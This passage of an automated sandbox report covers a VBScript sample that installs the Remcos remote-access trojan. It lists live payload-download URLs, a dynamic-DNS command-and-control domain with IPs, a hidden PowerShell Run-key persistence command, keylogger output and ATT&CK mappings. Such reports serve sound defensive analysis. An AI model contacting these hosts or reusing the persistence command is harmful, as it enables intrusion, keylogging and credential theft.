                        Source: Yara match | File source: 3.2.powershell.exe.29b2a788570.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000029.00000002.2090438296.0000000000677000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.2423857034.0000029B2A4A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.3325855778.0000000002DEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000008.00000002.3320747702.0000000001217000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000003.00000002.2423857034.0000029B2A788000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000001B.00000002.2023426786.0000000000967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000015.00000002.2934541950.0000023A4A8EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000024.00000002.3019490285.000001B9A399D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2124, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7344, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6852, type: MEMORYSTR
                        Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: cmd.exe | 27_2_0040569A
MITRE ATT&CK Matrix (techniques listed per tactic column; the numbers in brackets are the report's count badges, reproduced as shown)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses

Resource Development: Scripting [321]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise

Execution: Native API [11]; Exploitation for Client Execution [1]; Command and Scripting Interpreter [2]; Service Execution [2]; PowerShell [3]; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell

Persistence: Scripting [321]; DLL Side-Loading [1]; Windows Service [1]; Registry Run Keys / Startup Folder [21]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron

Privilege Escalation: DLL Side-Loading [1]; Bypass User Account Control [1]; Access Token Manipulation [1]; Windows Service [1]; Process Injection [222]; Registry Run Keys / Startup Folder [21]; Startup Items; Scheduled Task/Job; At; Cron

Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [2]; DLL Side-Loading [1]; Bypass User Account Control [1]; Masquerading [1]; Virtualization/Sandbox Evasion [21]; Access Token Manipulation [1]; Process Injection [222]; Dynamic API Resolution

Credential Access: OS Credential Dumping [1]; Input Capture [211]; Credentials In Files [2]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing

Discovery: System Time Discovery [2]; Account Discovery [1]; System Service Discovery [1]; File and Directory Discovery [4]; System Information Discovery [33]; Security Software Discovery [21]; Virtualization/Sandbox Evasion [21]; Process Discovery [3]; Application Window Discovery [1]; System Owner/User Discovery [1]

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot

Collection: Archive Collected Data [11]; Input Capture [211]; Clipboard Data [3]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging

Command and Control: Ingress Tool Transfer [12]; Encrypted Channel [21]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [23]; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

Impact: System Shutdown/Reboot [1]; Defacement [1]; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
Behavior Graph (ID: 1519307; Sample: sostener.vbs; Start date: 26/09/2024; Architecture: WINDOWS; Score: 100). Numbers in brackets after a process name are the graph's count badges, reproduced as shown.

Start node
  Network: comandoespecial2023.duckdns.org (Uses dynamic DNS services); www.informacionoportuna.com; 2 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 20 other signatures
  Processes started:
  wscript.exe [1]
    Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
    powershell.exe [7]
      Signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy; Found suspicious powershell code related to unpacking or dynamic code loading; Wscript called in batch mode (surpress errors)
      conhost.exe
      powershell.exe [14 17]
        Network: informacionoportuna.com 15.235.85.194, 443, 49730, 49731, HP-INTERNET-ASUS, United States
        Dropped: C:\Users\user\AppData\Local\Temp\xx2.vbs (ASCII); C:\Users\user\AppData\Local\Temp\xx1.ps1 (ASCII)
        Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
        RegSvcs.exe
          Signatures: Contains functionality to bypass UAC (CMSTPLUA); Contains functionalty to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; 3 other signatures
        RegSvcs.exe [3 16]
          Network: comandoespecial2023.duckdns.org 173.208.241.155, 49733, 8888, WIIUS, United States; geoplugin.net 178.237.33.50, 49734, 80, ATOM86-ASATOM86NL, Netherlands
          Dropped: C:\ProgramData\remcos\logs.dat (data)
          Signatures: Detected Remcos RAT; Installs a global keyboard hook
        powershell.exe [24]
          Signature: Loading BitLocker PowerShell Module
          powershell.exe [1 11]
            Signatures: Creates autostart registry keys with suspicious values (likely registry only malware); Creates autostart registry keys with suspicious names
        2 other processes
          Dropped: C:\Users\...\sostener.vbs:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\sostener.vbs (Unicode)
  powershell.exe [11]
    conhost.exe
    wscript.exe
      Signature: Wscript starts Powershell (via cmd or directly)
      powershell.exe
        Signature: Wscript called in batch mode (surpress errors)
        conhost.exe
        wscript.exe
          Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly)
          powershell.exe
            Signature: Suspicious powershell command line found
            conhost.exe
            powershell.exe
              Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
              RegSvcs.exe
                Signature: Detected Remcos RAT
              powershell.exe
                powershell.exe
              powershell.exe
              2 other processes
  powershell.exe
    conhost.exe
    wscript.exe
      powershell.exe
        conhost.exe
        wscript.exe
          powershell.exe
            conhost.exe
            powershell.exe
              RegSvcs.exe
              powershell.exe
                powershell.exe
              powershell.exe
              powershell.exe

Antivirus detection (Source | Detection | Scanner | Label)
sostener.vbs | 13% | ReversingLabs | Win32.Trojan.Honolulu
No Antivirus matches
No Antivirus matches
No Antivirus matches
URL detection (Source | Detection | Scanner | Label)
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXT | 100% | Avira URL Cloud | malware
https://www.informacionoportuna.com/wp-content/uploads/2024/ | 100% | Avira URL Cloud | malware
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpl | 0% | Avira URL Cloud | safe
https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt | 100% | Avira URL Cloud | malware
http://informacionoportuna.com | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Avira URL Cloud | safe
http://www.informacionoportuna.com | 0% | Avira URL Cloud | safe
https://www.informacionoportuna.com | 0% | Avira URL Cloud | safe
https://aka.ms/pscore6 | 0% | Avira URL Cloud | safe
http://geoplugin.net/json.gpSystem32 | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
https://www.informacionoportuna.com/wp-content/uploads/2024/07/r | 100% | Avira URL Cloud | malware
http://crl.m | 0% | Avira URL Cloud | safe
https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt | 100% | Avira URL Cloud | malware
http://crl.v | 0% | Avira URL Cloud | safe
special2023.duckdns.org | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
informacionoportuna.com | 15.235.85.194 | true | true | - | unknown
comandoespecial2023.duckdns.org | 173.208.241.155 | true | true | - | unknown
geoplugin.net | 178.237.33.50 | true | false | - | unknown
www.informacionoportuna.com | unknown | unknown | true | - | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt | true | Avira URL Cloud: malware | unknown
https://www.informacionoportuna.com/wp-content/uploads/2024/07/remcos.txt | true | - | unknown
special2023.duckdns.org | true | Avira URL Cloud: safe | unknown
https://www.informacionoportuna.com/wp-content/uploads/2024/09/pesky.txt | true | Avira URL Cloud: malware | unknown
http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
URLs found in process memory (Name | Source process | Malicious | Antivirus Detection | Reputation; the per-entry memory dump identifiers are omitted)
HTTPS://WWW.INFORMACIONOPORTUNA.COM/WP-CONTENT/UPLOADS/2024/07/REMCOS.TXT | powershell.exe | false | Avira URL Cloud: malware | unknown
http://nuget.org/NuGet.exe | powershell.exe | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe | false | Avira URL Cloud: safe | unknown
https://www.informacionoportuna.com/wp-content/uploads/2024/ | powershell.exe | true | Avira URL Cloud: malware | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe | false | URL Reputation: safe | unknown
http://geoplugin.net/json.gpl | RegSvcs.exe | false | Avira URL Cloud: safe | unknown
https://www.informacionoportuna.com | powershell.exe | true | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe | false | URL Reputation: safe | unknown
http://informacionoportuna.com | powershell.exe | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe | false | URL Reputation: safe | unknown
https://aka.ms/pscore6 | powershell.exe | false | Avira URL Cloud: safe | unknown
http://www.informacionoportuna.com | powershell.exe | false | Avira URL Cloud: safe | unknown
https://www.informacionoportuna.com/wp-content/uploads/2024/07/r | powershell.exe | false | Avira URL Cloud: malware | unknown
https://github.com/Pester/Pester | powershell.exe | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gpSystem32 | RegSvcs.exe | false | Avira URL Cloud: safe | unknown
http://crl.m | powershell.exe | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, RegSvcs.exe | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe | false | URL Reputation: safe | unknown
http://crl.v | powershell.exe | false | Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe | false | URL Reputation: safe | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
15.235.85.194 | informacionoportuna.com | United States | 71 | HP-INTERNET-ASUS | true
173.208.241.155 | comandoespecial2023.duckdns.org | United States | 32097 | WIIUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1519307
                                  Start date and time:2024-09-26 10:54:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 14s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                   Number of new started processes analysed:43
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:sostener.vbs
                                  Detection:MAL
                                  Classification:mal100.rans.troj.spyw.expl.evad.winVBS@70/58@4/3
                                  EGA Information:
                                  • Successful, ratio: 42.9%
                                  HCA Information:
                                  • Successful, ratio: 98%
                                  • Number of executed functions: 28
                                  • Number of non-executed functions: 208
                                  Cookbook Comments:
                                  • Found application associated with file extension: .vbs
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                   • Execution Graph export aborted for target RegSvcs.exe, PID 2124 because there are no executed functions
                                   • Execution Graph export aborted for target powershell.exe, PID 3272 because it is empty
                                   • Execution Graph export aborted for target powershell.exe, PID 5432 because it is empty
                                   • Execution Graph export aborted for target powershell.exe, PID 8032 because it is empty
                                   • Not all processes were analyzed; the report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • VT rate limit hit for: sostener.vbs
                                   Time | Type | Description
                                   04:55:07 | API Interceptor | 232x Sleep call for process: powershell.exe modified
                                   04:55:44 | API Interceptor | 1712794x Sleep call for process: RegSvcs.exe modified
                                   09:55:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                                   09:55:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run _______________________------------- Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                                   Match: 178.237.33.50
                                   Associated Sample Name / URL | Detection | Threat Name | Context
                                   SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
                                   6122.scr.exe | malicious | Remcos | geoplugin.net/json.gp
                                   6122.scr.exe | malicious | Remcos | geoplugin.net/json.gp
                                   SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | malicious | Remcos | geoplugin.net/json.gp
                                   https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | geoplugin.net/json.gp
                                   file.exe | malicious | Remcos | geoplugin.net/json.gp
                                   SDWLLRJcsY.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
                                   BL.xls | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
                                   z65orderrequest.bat.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
                                   Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
                                   Match: geoplugin.net
                                   Associated Sample Name / URL | Detection | Threat Name | Context
                                   SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                   6122.scr.exe | malicious | Remcos | 178.237.33.50
                                   6122.scr.exe | malicious | Remcos | 178.237.33.50
                                   SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | malicious | Remcos | 178.237.33.50
                                   Marys Organizer 2023 Release.zip | malicious | Remcos | 178.237.33.50
                                   https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | 178.237.33.50
                                   file.exe | malicious | Remcos | 178.237.33.50
                                   SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 178.237.33.50
                                   BL.xls | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                   z65orderrequest.bat.exe | malicious | GuLoader, Remcos | 178.237.33.50
                                   Match: WIIUS
                                   Associated Sample Name / URL | Detection | Threat Name | Context
                                   http://brigittenoel.com/wp-admin/js/alt/TS/wallet.html | malicious | Unknown | 173.208.194.98
                                   https://chattts-49f1.beszyrecala.workers.dev/f9f981ac-a3fc-46ec-96fe-22= | malicious | Unknown | 173.208.137.67
                                   https://segurancanosdados.com/principal.html | malicious | Unknown | 173.208.138.219
                                   http://pub-0bf7cd9e2c85443595cf1e36e3935ce0.r2.dev/woae.html | malicious | Unknown | 173.208.194.98
                                   https://pub-be64ef602be34b23842115eb08227fd2.r2.dev/ededu.html | malicious | Unknown | 173.208.194.98
                                   https://cepmmvirtual.edu.pe/ch/ | malicious | Unknown | 173.208.144.138
                                   ExeFile (145).exe | malicious | Emotet | 69.30.203.214
                                   ExeFile (156).exe | malicious | Emotet | 69.30.203.214
                                   https://kyo.mjj.mybluehost.me/Metamask-Draga/MT/ | malicious | Unknown | 173.208.194.98
                                   https://pub-2b9b096c777f479495c3e42da3b8a2e0.r2.dev/ledge.html | malicious | Unknown | 173.208.194.98
                                   Match: HP-INTERNET-ASUS
                                   Associated Sample Name / URL | Detection | Threat Name | Context
                                   http://WWW.LUTHERANSONLINE.COM/SHALOMIC | malicious | Unknown | 15.235.211.177
                                   rsJtZBgpwG.elf | malicious | Mirai | 15.178.34.35
                                   https://jhgfurighiuhoisrfuu98rujerfhiu.pages.dev/coderogers.html | malicious | HTMLPhisher | 15.156.174.66
                                   Facturas de pago 003839,72011,030184.bat.exe | malicious | AgentTesla | 15.235.118.15
                                   https://credit.fb-business.com/ | malicious | Unknown | 15.235.209.42
                                   http://t.yesware.com/tt/0ffd1f55c7e6a0ced56d29538e63fa334cce8cd2/340be3fbd5588b7ae8659d398f6ebdbe/6b6b3691935bcccf7dc7e5bf662a5dca/www.techcare.cl/pt/?conceicao.martins@cellnextelecom.pt | malicious | Unknown | 15.235.4.255
                                   Lista de embalaje y direcci#U00f3n de DHL.bat.exe | malicious | AgentTesla | 15.235.118.15
                                   D0F48A0632B6C451791F4257697E861961F06A6F.html | malicious | Unknown | 15.204.241.81
                                   firmware.i686.elf | malicious | Unknown | 15.157.89.240
                                   firmware.mipsel.elf | malicious | Unknown | 15.157.89.240
                                   Match: ATOM86-ASATOM86NL
                                   Associated Sample Name / URL | Detection | Threat Name | Context
                                   SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                   6122.scr.exe | malicious | Remcos | 178.237.33.50
                                   6122.scr.exe | malicious | Remcos | 178.237.33.50
                                   SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | malicious | Remcos | 178.237.33.50
                                   Marys Organizer 2023 Release.zip | malicious | Remcos | 178.237.33.50
                                   https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | 178.237.33.50
                                   file.exe | malicious | Remcos | 178.237.33.50
                                   SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 178.237.33.50
                                   BL.xls | malicious | Remcos, PureLog Stealer | 178.237.33.50
                                   z65orderrequest.bat.exe | malicious | GuLoader, Remcos | 178.237.33.50
                                   Match: 3b5074b1b5d032e5620f69f9f700ff0e
                                   Associated Sample Name / URL | Detection | Threat Name | Context
                                   SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe | malicious | Snake Keylogger, VIP Keylogger | 15.235.85.194
                                   CMR_7649.EXE.exe | malicious | Snake Keylogger, VIP Keylogger | 15.235.85.194
                                   RFQ____RM quotation_JPEG IMAGE.img.exe | malicious | Snake Keylogger | 15.235.85.194
                                   RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | malicious | AgentTesla, RedLine | 15.235.85.194
                                   QUOTATION_SEPQTRA071244#U00faPDF.scr.exe | malicious | Snake Keylogger | 15.235.85.194
                                   450230549.exe | malicious | AgentTesla | 15.235.85.194
                                   450230549.exe | malicious | Unknown | 15.235.85.194
                                   TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 15.235.85.194
                                   https://geminiqwc-sw.top/ | malicious | Unknown | 15.235.85.194
                                   http://tiktok1688.cc/ | malicious | Unknown | 15.235.85.194
                                  No context
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):552
                                  Entropy (8bit):3.4647429182669884
                                  Encrypted:false
                                  SSDEEP:12:6l+ec0WFe5BWFe5Tw0kqW1+fCsv9w0kFW+:6Nc0WqBWqUdqW1+fCBdFW+
                                  MD5:23EBF676CC03711678B10D0946CA71B1
                                  SHA1:DBB46EF74D68154712AF970A929E74D9A606300B
                                  SHA-256:614046A256E0F286DD6E8F141DB95B61A10678C23DA11713A263A3749935E22C
                                  SHA-512:36FFC2BDFDCEAA0DC672BEBB76061778FE67439D8A1DC3005433FF8E9E676D0966BF32FB8AE114530EC0562ABDE5FCA15FF2A87EBDABC61507B42893A8F19321
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                  Preview:....[.2.0.2.4./.0.9./.2.6. .0.4.:.5.5.:.1.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.P.o.w.e.r.S.h.e.l.l...e.x.e.].........[.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):962
                                  Entropy (8bit):5.013811273052389
                                  Encrypted:false
                                  SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                  MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                  SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                  SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                  SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                  Malicious:false
                                  Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):28398
                                  Entropy (8bit):5.063590717663346
                                  Encrypted:false
                                  SSDEEP:768:TLbV3IpNBQkj2Uh4iUxkOZhxCardFvJOOdB8tAHkLNZzNKe1MlYo7YPU:TLbV3CNBQkj2Uh4iUxkOgqdJJOOdB8tu
                                  MD5:E489B959E14B529323FF0CFBF6CB9E56
                                  SHA1:B6150F38208711CD985C3434E62B37D1A71845B5
                                  SHA-256:AA30F61810AEE09A2FC4AEC7662809B7ADC47287FAF312DCFD0CF983B80AAE0E
                                  SHA-512:CE9985AFD0EB08BA7B4755735BCD609089040D8D59948C0776072C4A90B13C46FB8847A673E86A75777A0BEECF7C4E0EBAE53561AD8186F7A481EF57B48A39B6
                                  Malicious:false
                                  Preview:PSMODULECACHE.-...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
